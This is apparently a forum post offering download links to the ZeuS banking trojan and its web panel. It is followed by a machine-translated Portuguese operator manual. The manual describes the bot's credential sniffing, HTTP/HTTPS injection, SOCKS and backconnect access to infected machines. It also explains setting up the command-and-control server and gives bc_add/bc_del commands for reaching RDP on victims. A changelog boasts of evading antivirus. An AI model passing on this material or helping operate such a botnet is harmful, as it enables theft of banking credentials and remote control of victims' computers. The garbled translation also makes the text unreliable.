onte: Dr.vladimir
Rar inclui:
Zeus 1.2.7.11
Zeus Firefox 1.2.7.7 + / / deveria funcionar melhor do que 1.2.7.11 =)
Painel de pesquisa 1.2.5.1
*** UPDATE: Painel de pesquisa 1.2.7.11 adicionado! ***
*** UPDATE *** Comandos adicionou 24,10 + Tut
Devem estar todos prontos limpo.
DOWNLOAD:
Código:
Zeus 1.2.2.7 u 11 + Webpanel 1.2.5.1 http://ul.to/0cfwol WEBPANEL 1.2.7.11: http://ul.to/kppun0
========================= ========================= =====
Guia do Usuário (Projecto) translate.google.com
************************* **********
==============
= Índice =
==============
1. Descrição e instalações.
2. Configurando o servidor.
2.1. HTTP-servidor.
2.2. O interpretador PHP.
2.3. MySQL-server.
2.4. Painel de controle.
2.4.1. Ambiente.
2.4.2. Update.
2.4.3. O sistema de arquivos / fsarc.php.
3. Ambiente Bot.
4. Trabalhando com BackConnect.
5. Histórico.
6. FAQ
7. Mitos.
========================= =====
= 1. Descrição e instalações. =
========================= =====
ZeuS - software para roubar dados pessoais do usuário em sistemas remotos, Windows. Em
linguagem simples, de "Tróia", "vírus", "backdoor". Mas o autor não gosta de tais palavras, portanto, mais documentação
Ele vai chamar esse software "bot".
Barco é inteiramente baseado na interceptação WinAPI em UserMode (Ring3), isso significa que o bot não usa
não há drivers ou downloads em Ring0. Esta característica torna possível executar até mesmo de Bota
Conta cliente Windows. Além disso, ele garante uma maior estabilidade e adaptabilidade
versões posteriores do Windows.
Bot é desenvolvido em Visual C + + versão 9.0 +, sem bibliotecas adicionais são usados
msvcrt Tipo, ATL, MFC, QT, etc Bot código é escrito com as prioridades a seguir (em ordem decrescente):
1. estabilidade (cuidadosamente verificados todos os resultados das funções de chamada, etc)
2. tamanho (para evitar duplicação de algoritmos, repetitivas chamadas, funções, etc)
3. velocidade (não o tipo de instrução while (1 ){..}, for (int i = 0; i <strlen (str); i ++){..}).
Funções e características bot:
1. Sniffer tráfego para o protocolo TCP.
1.1. Intercepção de FTP logins em qualquer porta.
1.2. Intercepção de logins POP3 em qualquer porta.
1.3. A intercepção de quaisquer dados do tráfego (um pedido pessoal).
2. Interceptação HTTP / solicitações HTTPS para wininet.dll, ou seja, todos os programas que trabalham com esta
biblioteca. Isso inclui o Internet Explorer (qualquer versão), Maxton, etc
2.1. Substituição ..
3. As funções do servidor.
3,1 Socks4/4a/5.
3,2 Bekkonekt por quaisquer serviços (RDP, Socks, FTP, etc) sobre a máquina infectada. Você pode
acesso a um computador que está atrás de um NAT, ou, por exemplo, que
banido da conexão à Internet.
3,3 Conseguir um screenshot da tela em tempo real.
- Não adicione ---
=========================
= 2. Configurando o servidor. =
=========================
O servidor é o ponto central de controle botnetom, ele estava montando robôs relatórios
eo impacto dos robôs os comandos. Não é recomendado o uso do "Virtual Hosting" ou "VDS", porque
com um botneta aumento, a carga sobre o servidor irá aumentar, e este tipo de hospedagem é bastante
rapidamente esgotou seus recursos. Você precisa de um "servidor dedicado" (Dedik), o mínimo recomendado
configuração:
1. 2GB de RAM.
2. 2Ggts 2x frequência da CPU,
3. SATA 7200rpm +
Para bot exige do servidor HTTP é conectado com PHP + Zend Optimizer, e do MySQL do servidor.
NOTA: Para os sistemas Windows é muito importante para editar (criar) o seguinte valor do Registro:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters \ MaxUserPort = dword: 65534
(Decimal)
---------------------
- 2.1. HTTP-servidor. -
---------------------
Como um servidor HTTP é recomendada para uso: para nix-sistemas - Apache a partir da versão 2.2, para
Windows-Sistemas - IIS da versão 6.0. Recomendamos que você mantenha o servidor HTTP na porta 80 ou 443 (este
efeito positivo sobre otstuk bot, como prestadores / proxy pode bloquear o acesso a outros
portas não-padrão).
Download Apache: Download Mirrors Apache - A Fundação Apache Software
IIS Site: O Site Oficial do Microsoft IIS
---------------------------
- 2.2. O interpretador PHP. -
---------------------------
A última versão do painel de controle projetado para PHP 5.2.6. É altamente recomendável
use a versão não é inferior a esta versão. Mas em casos extremos, não inferior a 5,2.
É importante fazer as seguintes configurações no php.ini:
safe_mode = Off
magic_quotes_gpc = Off
magic_quotes_gpc = Off
memory_limit = 256M; ou superior.
post_max_size = 100M; ou superior.
e recomendado para alterar as seguintes definições:
display_errors = Off
Também é necessário adicionar Zend Optimizer (aceleração do script, e execute o protegido
scripts). Recomendamos a versão 3.3.
Nós não recomendamos o PHP para o servidor via HTTP CGI.
Download PHP: PHP: Downloads
Download Zend Optimizer: PHP Web Application Server - Ferramentas de Desenvolvimento PHP - PHP Treinamento e Certificação - Zend.com
----------------------
- 2.3. MySQL-server. -
----------------------
MySQL é necessário para armazenar todos os dados sobre botnete. A versão recomendada é não inferior a 5.1.30, assim
vale a pena considerar que, quando o painel de controle nas versões mais antigas tem algumas
problema. Todos painel de controle da tabela, ir a um MyISAM, é importante para otimizar
velocidade de trabalho com este formato, com base nos recursos do servidor disponível.
Nós recomendamos as seguintes alterações à configuração do servidor MySQL (o meu ou my.ini):
max_connections = 2000 # ou superior
Download MySQL: MySQL:: MySQL Downloads
---------------------------
- 2.4. Painel de controle. -
---------------------------
2.4.1. Ambiente.
*****************
Nomeação de arquivos e pastas:
/ Instalar - o instalador.
/ Sistema - arquivos do sistema.
/ Sistema / fsarc.php - um script para chamar um archiver externo (seção 2.4.3).
/ Sistema / config.php - arquivo de configuração.
/ Tema - o arquivo de tema (design), sem Zend pode alterar livremente.
cp.php - logar no painel de controle.
gate.php - geyt de bots.
index.php - arquivo vazio para evitar a listagem de arquivos.
O painel de controle é geralmente localizado na pasta no servidor de distribuição [php]. Todo o conteúdo deste
pasta, você precisa fazer o upload para o servidor em qualquer diretório acessível por HTTP. Se você baixá-lo através de
FTP, todos os arquivos de download em modo binário.
Para nix-sistemas apresentam a direita:
. - 777
/ Sistema - 777
/ Tmp - 777
Para sistemas Windows:
\ System - o direito à plena escrever, ler apenas para usuários do segundo a qual o acesso
via HTTP. Para o IIS isto é, normalmente IUSR_ *.
\ Tmp - bem como para o sistema \.
Depois que todos os arquivos são baixados, você precisa de um navegador web para executar o instalador na URL
http://server/papka/install/index.php. Siga as instruções apareceu, no caso de
erros (você será notificado em pormenor) na instalação, verifique se todos os campos estão corretos
ea instalação correta dos direitos para a pasta.
Após a instalação, recomendamos que você exclua o diretório de instalação, e cp.php renomear arquivos (entrada para o
painel) e gate.php (geyt para robôs) em qualquer arquivo que você quer (mude a extensão
não).
Agora você pode com segurança entrar no painel de controle, digitando a URL do navegador renomeado
Arquivo cp.php.
2.4.2. Update.
******************
Se você tem uma nova cópia do painel de controle, e deseja atualizar uma versão anterior, o
deve fazer o seguinte:
1) Copie os arquivos de um novo painel no lugar das antigas.
2) Renomeie arquivos e cp.php gate.php com seus nomes reais de sua escolha durante a instalação
o painel de controle de idade.
3) Em qualquer caso, o direito de re-definir o diretório de acordo com o parágrafo 2.4.
4) com um browser para executar o instalador para http://server/direkt...stall/index.php URL, e
pareceu seguir as instruções. O processo de instalação pode levar um bem grande
período de tempo, isso se deve ao fato de que alguns quadros podem ser re-registros.
5) Você pode usar o novo painel de controle.
2.4.3. O sistema de arquivos / fsarc.php.
************************* *****
Este arquivo contém uma função para chamar um archiver externo. Neste momento, o arquivo
usado apenas em "Relatórios:: Busca nos arquivos" (reports_files), e é chamado para carregar
Arquivos e pastas em um único arquivo. Por padrão, definido para fechar o arquivo, e é
universal para Windows e nix, então tudo que você precisa fazer é instalar o sistema esta
arquivo, e para a direita em sua execução. Você também pode editar esse arquivo para trabalhar com
qualquer archiver.
Download CEP: http://www.info-zip.org/Zip.html.
======================
= 3. Ambiente Bot. =
======================
========================= ==
= 4. Trabalhando com BackConnect =
========================= ==
Trabalhando com BackConnect considerado como um exemplo.
BackConnect IP do servidor: 192.168.100.1
Porta para o bot: 4500
Porta para o aplicativo cliente: 1080
1) Execute o aplicativo de servidor (zsbcs.exe ou zsbcs64.exe) no servidor tem um IP na
aplicação de Internet especifica a porta, que se espera para conectar o bot, eo porto de
que vai ligar o aplicativo cliente. Por exemplo zsbcs.exe ouvir-cp: 1080 bp: 4500,
em 1080 - a porta do cliente 4500 - porta para o bot.
2) a necessidade Bota enviou uma equipe bc_add server_port server_host serviço, onde o serviço -
número da porta ou nome de serviço *, que precisa se conectar ao Bota.
* Atualmente suportado apenas em nome de meias, que permite conectar-se a built-in
Meias-bot do servidor.
server_host - um servidor de aplicativo de servidor que zapusheno. Ele pode ser usado IPv4,
IPv6, ou domínio.
server_port - uma porta que está especificada no aplicativo de servidor opção cp. Nesse caso, 4500.
Exemplo: 192.168.100.1 meias bc_add 4500 - como resultado você começa a meias,
bc_add 3389 192.168.100.1 4500 - como um resultado que obtém RDP.
3) Agora você precisa esperar por bot para se conectar ao servidor, nesse período, qualquer tentativa de cliente
pedidos de contato serão ignorados (irá desconectar o cliente). Crachá
contato bot será a saída para o console linha de servidores "nova conexão de bot aceitado ...".
4) Depois de conectar o bot, você pode trabalhar com seu cliente. Ou seja, você só
conectar ao servidor para a porta do cliente (neste caso, 1080). Por exemplo, se você deu
meias da equipe, uma porta em que o cliente vai ser esperado para Meias-servidor, se a porta 3389, então
você se conectar a 192.168.100:1080 como RDP normal.
5) Depois disso, quando você não precisa BackConnect do bot para um determinado serviço, deverá pagar
clique server_port server_host bc_del serviço, onde todos os parâmetros devem ser idênticos
bc_add parâmetros, que devem ser removidos. Você também pode usar a especificação. caracteres
'*' E '?'.
Por exemplo: * * * bc_del - apaga todos os BackConnect'y Esta Bota.
bc_del * 192,168 * .* remover todos BackConnect'y, ligue para o servidor com IP 192,168 .*.
bc_del 3389 192.168.100.1 4500 - especificamente remove um BackConnect.
NOTAS:
1) Você pode especificar qualquer número de BackConnect'ov (ie bc_add), mas eles não devem ser partilhados
combinação de IP + porta. Mas se existe essa combinação, será lançado primeiro acrescentou.
2) Para cada BackConnect'a, você deve executar um aplicativo de servidor separado.
3) se a conexão (queda de queda do servidor bot, etc), bot irá repetir a conexão
para o servidor indefinidamente (mesmo após reiniciar o PC), até BackConnect não serão removidos
(Ou seja, bc_del).
4) Como um serviço para bc_add, você pode usar qualquer porta aberta no endereço 127.0.0.1.
5) A aplicação de servidor suporta IPv6, mas, em princípio, no presente momento, esse apoio não é particularmente
relevantes.
6) Você pode iniciar o aplicativo de servidor com o vinho. Escrevendo a aplicação elf mesmo não está
planejado.
7) É recomendável usar a opção pb portas popular aplicativo de servidor (80, 8080,
443, etc), pois as outras portas podem ser bloqueadas pelo provedor que o bot.
8) não devem ser autorizados a se conectar a diferentes robôs na mesma porta do servidor ao mesmo tempo.
9) O método de uma ligação pode ser útil para os robôs, que estão fora do NAT, porque às vezes
O firewall do Windows ou o provedor pode ser bloqueado a partir da conexão com a Internet.
NOTA: Este recurso não está disponível em todas as compilações Bot.
======================
= 5. Histórico. =
======================
Tags condicionais: [*] - Para mudar.
[-] - A correção.
[+] - Adicionar.
[Versão 1.2.0.0, 2008/12/20]
Geral: [*] Já não vai a documentação em arquivo chm, tudo será escrito para este ficheiro.
[+] Agora, o barco é capaz de receber comandos não só com o status de envio, mas ao enviar
files / logs.
[+] Pedidos de dados locais para o servidor eo arquivo de configuração é criptografada com a chave RC4 para
Sua escolha. [*] Totalmente atualizado protocolo bot - servidor <>. Talvez a diminuição da carga sobre o servidor.
Barco:
[-] Corrigido o erro que o bloqueio de bots limitado de tela do Windows. [*] Escreveu um novo PE-kriptor agora arquivar-PE é muito precisa e mais
simula os resultados da Linker MS 9.0. [*] Atualizado em processo de construção para bildere Bot. [*] Compressão otimizada do arquivo de configuração. [*] O novo formato é um arquivo de configuração binário. [*] Reescreveu o processo de montagem do arquivo de configuração binário. [*] Meias e LC estão agora trabalhando em uma porta.
Painel de Controle: [*] O status do painel de controle, transferido para o BETA. [*] Mudou todas tabelas MySQL. [*] Nachet uma transferência gradual do Painel de Controle do UTF-8 (pode ser problemas temporários com
exibição de caracteres). [*] Atualizado geobaza.
[Versão 1.2.1.0, 30.12.2008]
Barco: [*] Respostas BOFA são enviados como BLT_GRABBED_HTTP (foi BLT_HTTPS_REQUEST).
[-] Pequeno erro no envio de relatórios.
[-] O tamanho do relatório não poderá exceder ~ 550 caracteres.
[-] Erro existe desde o início do bot: um tempo limite de baixa para o envio de solicitações POST
resultando em um bloqueado o envio de longa duração (mais de ~ 1 Mb) Relatório sobre a lenta
compostos (não estável), como as implicações teóricas - bot totalmente parado de enviar
Records.
Geral:
[+] No registro tipo de registro do caso e BLT_HTTP_REQUEST campo BLT_HTTPS_REQUEST SBCID_PATH_SOURCE
(Na tabela path_source) acrescentou caminho de URL.
Painel de Controle: [*] Atualizado redir.php.
[Versão 1.2.2.0, 2009/03/11]
Barco:
[-] Corrigido o erro em HTTP inzhektah existe para todas as versões do bot. Quando
utilização na wininet.dll modo assíncrono, foi tempo perdido
sincronizar os fluxos gerados wininet.dll, com o resultado que, sob certas condições
foi uma exceção.
[+] Por inzhekta HTTP, agora também alterar os arquivos no cache local.
A ausência desse refinamento nem sempre pode ativar HTTP inzhektam.
[+] Reduzir o tamanho de arquivo de PE.
[Versão 1.2.3.0, 2009/03/28]
Barco:
[-] Minor bug na kriptore, graças ao valoroso govnoanalitikam da Avira.
Geral: [*] Modificado o protocolo bots equipes de distribuição.
Painel de Controle: [*] Completamente reescrito Painel de Controle. [*] Design reescrito em XHTML 1.0 Strict (para o IE não funciona). [*] O barco está agora de novo capaz de receber comandos somente quando o envio de um relatório sobre o status on-line
(Carga muito alta). [*] Atualizado geobaza.
[Versão 1.2.4.0, 2009/02/04]
Barco:
[+] Quando usando o HTTP, o cabeçalho User-Agent é agora lida pelo Internet Explorer, ao invés de
é uma constante como antes. Teoricamente, devido à constante Usuário Agent'a, consultas
provedores podem ser bloqueadas ou cair sob suspeita.
Painel de controle:
[-] Corrigido um bug exibição de registros que contêm caracteres 0-31 e 127-159.
=============
= 6. FAQ =
=============
Q: Qual é a versão números significam?
R: abcd
a - uma mudança completa no seu bot.
b - as principais alterações que causam incompatibilidade total ou parcial, com prévia
versões.
c - corrigir erros, aperfeiçoar, acrescentar funcionalidades.
d - o número de limpeza para a versão atual do antivírus abc
Q: Como a Geração Bot ID?
R: Bot ID consiste de duas partes: o nome%% _% número%, onde o nome - o nome do computador (o resultado da
GetComputerName), um número - um determinado número que é gerado com base em alguns dados do sistema único de operação.
Q: Porque é que o tráfego é criptografado usando a criptografia simétrica (RC4), mas não assimétrica (RSA)?
R: Porque o uso de algoritmos complexos não faz sentido, você precisa criptografar apenas para ocultar
tráfego. Plus RSA só em termos de não conhecer a chave está no painel de controle não
capacidade de emular as suas respostas. E o significado é o de defender esta (globalmente
exibição)?
Q: Eu danificado tabelas / painel de arquivos, o que devo fazer?
R: Tocar com as instruções especificadas no ponto 2.5.
===========
7. Mitos =
===========
M: ZeuS usa uma DLL para o trabalho.
R: Falso. Existe apenas um arquivo executável PE (exe). DLL, SYS, etc, não quando não havia
vryatli nunca vai ser. Este mito foi devido ao fato de que em alguma versão de bot
configuração de armazenamento utilizado para arquivos com extensões como.
M: ZeuS usa COM (BHO) para a intercepção do Internet Explorer.
R: Falso. Sempre usar este para interceptar WinAPI de wininet.dll.
